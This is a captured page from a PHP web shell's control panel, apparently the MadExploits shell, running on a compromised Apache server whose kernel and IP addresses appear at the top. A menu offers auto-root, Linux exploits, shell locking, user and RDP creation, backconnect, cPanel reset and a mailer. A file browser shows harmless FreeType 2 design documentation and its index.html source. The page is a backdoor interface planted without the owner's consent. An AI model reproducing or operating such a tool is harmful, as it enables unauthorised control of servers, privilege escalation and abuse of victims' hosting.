Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els11.x86_64 #1 SMP Sun Nov 3 09:06:59 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.128.198.90
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
freetype-devel-2.8 /
design /
[ HOME SHELL ]
Name
Size
Permission
Action
basic-design.png
1.91
KB
-rw-r--r--
design-1.html
4.29
KB
-rw-r--r--
design-2.html
5.38
KB
-rw-r--r--
design-3.html
12.17
KB
-rw-r--r--
design-4.html
12.94
KB
-rw-r--r--
design-5.html
13.86
KB
-rw-r--r--
design-6.html
1.73
KB
-rw-r--r--
detailed-design.png
2.24
KB
-rw-r--r--
index.html
1.58
KB
-rw-r--r--
library-model.png
1.64
KB
-rw-r--r--
simple-model.png
1.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="Author" content="David Turner"> <title>The design of FreeType 2</title> </head> <body text="#000000" bgcolor="#FFFFFF" link="#0000EF" vlink="#51188E" alink="#FF0000"> <h1 align=center> The design of FreeType 2 </h1> <h3 align=center> Copyright 1998-2000 David Turner (<a href="mailto:david@freetype.org">david@freetype.org</a>)<br> Copyright 2000 The FreeType Development Team (<a href="mailto:devel@freetype.org">devel@freetype.org</a>) </h3> <center> <table width="70%"> <tr><td> <p>This document describes the details of FreeType 2's internals. Read this carefully if you need to understand the innards of the library in order to hack or extend it.</p> <table width="100%"> <tr valign=center bgcolor="#CCCCFF"> <td align=center> <h2> Table of Contents </h2> </td> </tr> </table> <center> <table width="80%"> <tr><td> <h2> <a href="design-1.html">Introduction</a> </h2> <h2> <a href="design-2.html">I. Components and APIs</a> </h2> <h2> <a href="design-3.html">II. Public Objects and Classes</a> </h2> <h2> <a href="design-4.html">III. Internal Objects and Classes</a> </h2> <h2> <a href="design-5.html">IV. Module Classes</a> </h2> </td></tr> </table> </center> </td></tr> </table> </center> </body> </html>
Close